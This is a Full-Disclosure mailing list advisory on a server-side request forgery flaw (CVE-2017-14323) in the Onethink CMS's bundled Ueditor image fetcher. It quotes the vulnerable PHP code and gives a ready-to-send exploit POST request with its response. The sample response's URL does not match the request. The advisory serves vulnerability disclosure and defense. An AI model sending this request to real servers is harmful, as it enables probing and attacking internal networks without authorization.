lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 4 Apr 2018 21:06:13 +0800
From: "service@...maohui.net" <service@...maohui.net>
To: fulldisclosure <fulldisclosure@...lists.org>
Subject: [FD] SSRF(Server Side Request Forgery) in Onethink All version (CVE-2017-14323)

# SSRF(Server Side Request Forgery) in Onethink  All version (CVE-2017-14323)

The Onethink is an open source CMS(Content Management System).This system is based on the Thinkphp3.2 development framework. 

## Product Download: http://www.onethink.cn

## Vulnerability Type:SSRF(Server Side Request Forgery)

## Attack Type : Remote

## Vulnerability Description

Onethink uses a Ueditor editor with a flawed version that causes the SSRF vulnerability to occur.

The vulnerability code(/Public/static/ueditor/php/getRemoteImage.php):

    $uri = htmlspecialchars( $_POST[ 'upfile' ] );
    $uri = str_replace( "&amp;" , "&" , $uri );
    getRemoteImage( $uri,$config );
    //echo($uri);

    /**
     * 远程抓取
     * @param $uri
     * @param $config
     */
    function getRemoteImage( $uri,$config)
    {
        //忽略抓取时间限制
        set_time_limit( 0 );
        //ue_separate_ue  ue用于传递数据分割符号
        $imgUrls = explode( "ue_separate_ue" , $uri );
        $tmpNames = array();
        foreach ( $imgUrls as $imgUrl ) {
            //http开头验证
            if(strpos($imgUrl,"http")!==0){
                array_push( $tmpNames , "error" );
                continue;
            }
            //echo($imgUrl);
            //获取请求头
            $heads = get_headers( $imgUrl );   //This is a blind ssrf 
            //死链检测
            if ( !( stristr( $heads[ 0 ] , "200" ) && stristr( $heads[ 0 ] , "OK" ) ) ) {
                array_push( $tmpNames , "error" );
                continue;
            }

            //格式验证(扩展名验证和Content-Type验证)
            $fileType = strtolower( strrchr( $imgUrl , '.' ) );
            if ( !in_array( $fileType , $config[ 'allowFiles' ] ) || stristr( $heads[ 'Content-Type' ] , "image" ) ) {
                array_push( $tmpNames , "error" );
                continue;
            }
            //var_dump($tmpNames);

            //打开输出缓冲区并获取远程图片
            ob_start();
            $context = stream_context_create(
                array (
                    'http' => array (
                        'follow_location' => false // don't follow redirects
                    )
                )
            );
            //请确保php.ini中的fopen wrappers已经激活
            readfile( $imgUrl,false,$context);    //vulnerability is here,request any http(s) url
            $img = ob_get_contents();
            ob_end_clean();

## Exploit

Request Content:

    POST http://target/Public/static/ueditor/php/getRemoteImage.php HTTP/1.1
    Host: target
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 37
    Connection: keep-alive
    
    upfile=https://www.google.com/?%23.jpg

Response Content:
    
    HTTP/1.1 200 OK
    Server: nginx
    Content-Type: text/html; charset=utf-8
    Content-Length: 110

    {'url':'upload/43361505134158.jpg','tip':'远程图片抓取成功!','srcUrl':'http://www.baidu.com/?#.jpg'}

modify the above upfile parameter,example:

request http protocol: upfile=http://www.google.com

request https protocol: upfile=https://www.google.com

This vulnerability only use http、https protocol

this vulnerability  trigger need allow\_url\_fopen option is enable in php.ini,allow\_url\_fopen option defualt is enable.
## Versions

Onethink all version

## Impact

SSRF(Server Side Request Forgery) in Onethink V1.0 and V1.1 version allow remote attackers to information detection,internal network server attack.

## Credit

This vulnerability was discovered by Qian Wu & Bo Wang & Jiawang Zhang &  National Computer Network Emergency Response Technical Team/Coordination Center of China (CNCERT/CC)

## References

CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14323



service@...maohui.net

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux - Powered by OpenVZ